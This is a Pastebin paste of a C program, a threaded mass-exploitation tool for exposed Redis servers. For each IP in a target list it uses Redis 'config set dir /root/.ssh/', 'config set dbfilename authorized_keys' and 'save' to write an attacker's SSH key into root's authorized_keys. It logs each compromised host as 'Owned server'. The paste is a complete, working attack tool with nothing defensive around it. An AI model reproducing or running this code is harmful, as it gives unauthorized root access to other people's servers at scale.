Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- gcc -o exploit *.c -pthread -w
- */
- #include <stdio.h>
- #include <stdlib.h>
- #include <stdbool.h>
- #include <string.h>
- #include <unistd.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <sys/ioctl.h>
- #include <netinet/in.h>
- #include <poll.h>
- #include <netdb.h>
- #include <pthread.h>
- #include <fcntl.h>
- #include <errno.h>
- #include <netinet/tcp.h>
- #include "thpool.h"
- #define BUFSIZE 1024
- char* ip_file;
- char* ip_out_file;
- char* private_key_location;
- int nb_threads;
- int timeout;
- int target_port = 6379; //redis port
- char *file_contents;
- char *privateKey;
- char payload[5000] = {0};
- size_t num;
- char **lines;
- int current_line;
- void FileReader() {
- long input_file_size;
- FILE *input_file = fopen(ip_file, "rb");
- fseek(input_file, 0, SEEK_END);
- input_file_size = ftell(input_file);
- rewind(input_file);
- file_contents = malloc(input_file_size * (sizeof(char)));
- fread(file_contents, sizeof(char), input_file_size, input_file);
- fclose(input_file);
- FILE *f;
- privateKey = (char*)malloc(sizeof(char) * 1000);
- FILE *infile;
- infile = fopen(private_key_location, "rb");
- char line_buffer[1024];
- while (fgets(line_buffer, sizeof(line_buffer), infile)) {
- privateKey = line_buffer;
- }
- privateKey[strlen(privateKey) - 1] = '\0';
- sprintf(payload, "set qwe \"\\n\\n%s\\n\\n\\n\"\n", privateKey);
- printf("\npayload: %s\n", payload);
- fclose(infile);
- }
- void writeLine(char *fileName, char *content) {
- FILE *fp;
- int i;
- fp = fopen(fileName, "a");
- if (fp == NULL) {
- printf("There was an error when writing to the file!\n");
- return;
- }
- fprintf(fp, "%s\n", content);
- fclose(fp);
- return;
- }
- bool connect_w_to(char *hostname) {
- int res, valopt;
- struct sockaddr_in addr;
- long arg;
- fd_set myset;
- struct timeval tv;
- socklen_t lon;
- char buf[4048];
- int soc = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
- if (soc < 0)
- {
- printf("Error creating socks.\n");
- return false;
- }
- if ((arg = fcntl(soc, F_GETFL, NULL)) < 0)
- {
- fprintf(stderr, "Error fcntl(.., F_GETFL): %s\n", strerror(errno));
- return false;
- }
- arg |= O_NONBLOCK;
- if (fcntl(soc, F_SETFL, arg))
- {
- fprintf(stderr, "Error fcntl(.., F_SETFL): %s\n", strerror(errno));
- return false;
- }
- int val = 1;
- if (setsockopt(soc, IPPROTO_TCP, TCP_NODELAY, &val, sizeof(val)) < 0)
- {
- return false;
- }
- addr.sin_family = AF_INET;
- addr.sin_port = htons(target_port);
- addr.sin_addr.s_addr = inet_addr(hostname);
- res = connect(soc, (struct sockaddr *)&addr, sizeof(addr));
- if (res < 0) {
- if (errno == EINPROGRESS) {
- FD_ZERO(&myset);
- FD_SET(soc, &myset);
- tv.tv_sec = timeout;
- tv.tv_usec = 0;
- if (select(soc+1, NULL, &myset, NULL, &tv) > 0) {
- lon = sizeof(int);
- getsockopt(soc, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
- if (valopt) {
- fprintf(stderr, "Error in connection() %d - %s\n", valopt, strerror(valopt));
- close(soc);
- return false;
- }
- arg = fcntl(soc, F_GETFL, NULL);
- arg &= (~O_NONBLOCK);
- fcntl(soc, F_SETFL, arg);
- if (send(soc, "config set dir /root/.ssh/\n", 27, MSG_DONTWAIT) < 0) {
- printf("Error sending config set...");
- close(soc);
- return false;
- }
- else {
- int reader = -1;
- bzero(buf, BUFSIZE);
- FD_ZERO(&myset);
- FD_SET(soc,&myset);
- tv.tv_sec = timeout;
- tv.tv_usec = 0;
- if (select(soc+1, &myset, NULL, NULL, &tv) < 0) {
- printf("select error");
- reader = -1;
- }
- if (FD_ISSET(soc, &myset)) {
- reader = read(soc, buf, BUFSIZE);
- }
- else {
- printf("timeout\n");
- reader = -1;
- }
- printf("DATA: %s\n", buf);
- if(reader < 0) {
- printf("Error reading response of config set...\n");
- close(soc);
- return false;
- }
- else {
- if((strstr(buf, "OK") != NULL)) {
- write(soc, payload, strlen(payload));
- printf("payload %s\n", payload);
- bzero(buf, BUFSIZE);
- FD_ZERO(&myset);
- FD_SET(soc,&myset);
- tv.tv_sec = timeout;
- tv.tv_usec = 0;
- if (select(soc+1, &myset, NULL, NULL, &tv) < 0) {
- printf("select error");
- reader = -1;
- close(soc);
- return false;
- }
- if (FD_ISSET(soc, &myset)) {
- read(soc, buf, BUFSIZE);
- //printf("is it stopping0: %s\n", buf);
- }
- else {
- printf("timeout\n");
- reader = -1;
- close(soc);
- return false;
- }
- //printf("is it stopping2: %s\n", buf);
- if((strstr(buf, "OK") != NULL)) {
- write(soc, "config set dbfilename \"authorized_keys\"\n", 40);
- //read(soc, buf, BUFSIZE);
- bzero(buf, BUFSIZE);
- FD_ZERO(&myset);
- FD_SET(soc,&myset);
- tv.tv_sec = timeout;
- tv.tv_usec = 0;
- if (select(soc+1, &myset, NULL, NULL, &tv) < 0) {
- printf("select error");
- reader = -1;
- close(soc);
- return false;
- }
- if (FD_ISSET(soc, &myset)) {
- read(soc, buf, BUFSIZE);
- //printf("is it stopping0: %s\n", buf);
- }
- else {
- printf("timeout\n");
- reader = -1;
- close(soc);
- return false;
- }
- if((strstr(buf, "OK") != NULL)) {
- write(soc, "save\n", 6);
- writeLine(ip_out_file, hostname);
- close(soc);
- return true;
- }
- }
- }
- else
- {
- close(soc);
- return false;
- }
- }
- }
- }
- else {
- fprintf(stderr, "Timeout or error() %d - %s\n", valopt, strerror(valopt));
- close(soc);
- return false;
- }
- }
- else {
- close(soc);
- fprintf(stderr, "Error connecting %d - %s\n", errno, strerror(errno));
- return false;
- }
- }
- close(soc);
- return false;
- }
- char **strsplit(const char* str, const char* delim, size_t* numtokens) {
- char *s = strdup(str);
- size_t tokens_alloc = 1;
- size_t tokens_used = 0;
- char **tokens = calloc(tokens_alloc, sizeof(char*));
- char *token, *rest = s;
- while ((token = strsep(&rest, delim)) != NULL) {
- if (tokens_used == tokens_alloc) {
- tokens_alloc *= 2;
- tokens = realloc(tokens, tokens_alloc * sizeof(char*));
- }
- tokens[tokens_used++] = strdup(token);
- }
- if (tokens_used == 0) {
- free(tokens);
- tokens = NULL;
- } else {
- tokens = realloc(tokens, tokens_used * sizeof(char*));
- }
- *numtokens = tokens_used;
- free(s);
- return tokens;
- }
- void WorkingPayload(char *content) {
- if (connect_w_to(content))
- {
- printf("\x1b[32m[+] Owned server IP --> %s\x1b[0m\n", content);
- } else {
- printf("\x1b[32m[-] Failed to own server IP --> %s\x1b[0m\n", content);
- }
- }
- int *worker(void *line) {
- WorkingPayload(((char*)line));
- return 1;
- }
- void copy_string(char *target, char *source) {
- while (*source) {
- *target = *source;
- source++;
- target++;
- }
- *target = '\0';
- }
- int main(int argc, char **argv) {
- if (argc < 6) {
- printf("Usage: %s in_ip out_ip rsa_loc nb_threads timeout\ncat /proc/sys/kernel/threads-max\ncat /proc/sys/fs/file-max\n",argv[0]);
- exit(1);
- }
- else {
- ip_file = argv[1];
- ip_out_file = argv[2];
- private_key_location = argv[3];
- nb_threads = atoi(argv[4]);
- timeout = atoi(argv[5]);
- }
- FileReader();
- lines = strsplit(file_contents, "\n", &num);
- //connect_w_to("45.32.232.197");
- //exit(0);
- threadpool thpool = thpool_init(nb_threads);
- for (int i = 0; i < num - 1; i++) {
- int len = strlen(lines[i]);
- //lines[i][len - 1] = '\0';
- thpool_add_work(thpool, worker, lines[i]);
- }
- thpool_wait(thpool);
- thpool_destroy(thpool);
- return 0;
- }
Add Comment
Please, Sign In to add comment